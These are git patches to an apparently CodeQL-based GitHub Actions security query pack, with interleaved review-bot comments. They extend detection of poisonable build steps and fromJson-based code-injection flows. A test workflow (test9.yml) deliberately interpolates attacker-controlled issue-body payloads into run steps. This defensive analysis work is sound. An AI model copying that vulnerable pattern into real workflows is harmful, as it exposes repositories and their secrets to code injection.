| -| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
| +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. 
| +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 45d51a4d00996bec8af9cd8f2cd12891856afa59 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:29:53 +0200 Subject: [PATCH 0371/1267] Add more poisonable steps --- .../codeql/actions/security/PoisonableSteps.qll | 2 +- ql/lib/ext/config/poisonable_steps.yml | 15 +++++++++------ 2 files changed, 10 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 4165df17a4d..c228965736d 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) + cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index dc835e7dab2..f13a2a16d35 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -35,6 +35,9 @@ extensions: - ["npm i(nstall)?"] - ["npm run"] - ["npm ci"] + - ["pnpm i(nstall)?"] + - ["pnpm run"] + - ["pnpm ci"] - ["pre-commit"] - ["prettier"] - ["pip install -r"] 
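Review bot: The trailing group added to the `regexpCapture` pattern in `LocalScriptExecutionRunStep` cannot trim the captured command, because the `(.*)` capture in every `poisonableLocalScriptsDataModel` row (second hunk of `poisonable_steps.yml`) is greedy and runs to the end of the line first. For a constructed line such as `x=$(./build.sh) && echo ok`, `cmd` would come out as `build.sh) && echo ok`. Replacing `(.*)` in the data rows with a character class that stops at whitespace, `;`, `)` and a backtick would let the new terminators take effect. The new leading `.*` also lets the `\\b` alternative match mid-line, so a line like `echo "see install.sh for details"` appears to satisfy the `(source|sh|bash|zsh|fish)\\s+(.*)` row and may add false positives. How `cmd` is consumed is outside the hunk, so the effect on results should be confirmed with a test workflow.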
@@ -54,10 +57,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] + - ["(python)\\s+(.*)\\.py", 3] + - ["(ruby)\\s+(.*)\\.rb", 3] + - ["(go)\\s+(.*)\\.go", 3] From 4b01cd5be45dc8ebb161e7e55ec4e4ef7b8172c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:51:19 +0200 Subject: [PATCH 0372/1267] Support flow through fromJson --- ql/lib/codeql/actions/ast/internal/Ast.qll | 101 +++++++++++++++--- .../CWE-094/.github/workflows/test9.yml | 27 +++++ .../CWE-094/CodeInjectionCritical.expected | 17 +++ .../CWE-094/CodeInjectionMedium.expected | 13 +++ 4 files changed, 141 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9d2a5b38206..c6569367c10 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1194,12 +1194,25 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(expression, _)) or + exists(getAJsonReferenceExpression(expression, _)) + } abstract string getFieldName(); @@ -1236,8 +1249,17 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(secretsCtxRegex()) and + fieldName = expr.regexpCapture(secretsCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } 
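Review bot: The comment inside `getAJsonReferenceExpression` was copied from `getASimpleReferenceExpression` and does not describe this predicate: the pattern looks for `fromJson(...)` calls, not `${{...}}`. Because the `regexpFind` pattern ends in `.*`, the first match runs to the end of the string, so a second `fromJson(...)` in the same expression is presumably never returned. I would drop the trailing `.*` from the `regexpFind` pattern (the `regexpCapture` pattern can keep it) and reword the comment to `// Find every fromJson(<context reference>) call and return its argument.` A QLDoc comment on the predicate saying what `offset` denotes would also help callers.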
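Review bot: The `exists(string expr | ...)` block that unwraps `fromJson(...)` is repeated verbatim in `SecretsExpressionImpl` and in the `StepsExpressionImpl`, `NeedsExpressionImpl`, `JobsExpressionImpl`, `EnvExpressionImpl` and `MatrixExpressionImpl` hunks that follow; a single helper predicate would keep the six characteristic predicates in step. Centralising it also gives one place to tighten `"(?i)fromjson\\((.*)\\).*"`, whose greedy `(.*)` extends to the last `)` of the expression, so an expression with a further call after the `fromJson(...)` would presumably match no context regex and be missed. The class bodies continue outside the hunks.

```ql
// proposed helper, placed next to getAJsonReferenceExpression
bindingset[expression]
private string unwrapFromJson(string expression) {
  exists(getAJsonReferenceExpression(expression, _)) and
  result = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1)
  or
  exists(getASimpleReferenceExpression(expression, _)) and
  result = normalizeExpr(expression)
}

// in SecretsExpressionImpl; the other five classes take the same shape
SecretsExpressionImpl() {
  exists(string expr | expr = unwrapFromJson(expression) |
    expr.regexpMatch(secretsCtxRegex()) and
    fieldName = expr.regexpCapture(secretsCtxRegex(), 1)
  )
}
```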
@@ -1255,9 +1277,18 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1287,10 +1318,19 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and - neededJob.getLocation().getFile() = this.getLocation().getFile() + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(needsCtxRegex()) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expr.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + ) } override string getFieldName() { result = fieldName } 
@@ -1320,9 +1360,18 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1370,8 +1419,17 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } 
@@ -1396,8 +1454,17 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(matrixCtxRegex()) and + fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) + ) } override string getFieldName() { result = fieldAccess } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml new file mode 100644 index 00000000000..6ed7db83cb2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -0,0 +1,27 @@ +name: Test + +on: + issue_comment: + +jobs: + parse-issue: + runs-on: ubuntu-latest + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + - run: echo ${{ steps.issue_body_parser_request.outputs.payload }} + approve-or-deny-request: + runs-on: ubuntu-latest + needs: parse-issue + steps: + - run: echo ${{ needs.parse-issue.outputs.payload }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1b98263c16e..ff378f93af6 100644 
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | 
.github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -352,6 +365,10 @@ subpaths | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 35887c3b370..19b72ad6b5c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | 
.github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7e0146d63499a15c309d0f75da286fbbd3e9dd9e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:52:01 +0200 Subject: [PATCH 0373/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5518e074d30..320ef23e413 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.10 +version: 0.1.11 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d4f97a32ec6..e7a98574a89 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.10 +version: 0.1.11 groups: [actions, queries] suites: codeql-suites extractor: javascript From c70fb6e9114303784e8761cebfe9c7e8927ac4b2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:25:24 +0200 Subject: [PATCH 0374/1267] Consider toJson as a sanitizer for Code Injection in JS --- ql/lib/codeql/actions/ast/internal/Ast.qll | 30 +++++++++++++++++-- .../Security/CWE-094/CodeInjectionCritical.ql | 6 ++++ .../Security/CWE-094/CodeInjectionMedium.ql | 6 ++++ .../CWE-094/.github/workflows/test9.yml | 12 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 7 +++++ .../CWE-094/CodeInjectionMedium.expected | 4 +++ 6 files changed, 63 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index c6569367c10..7c7c6216b1b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
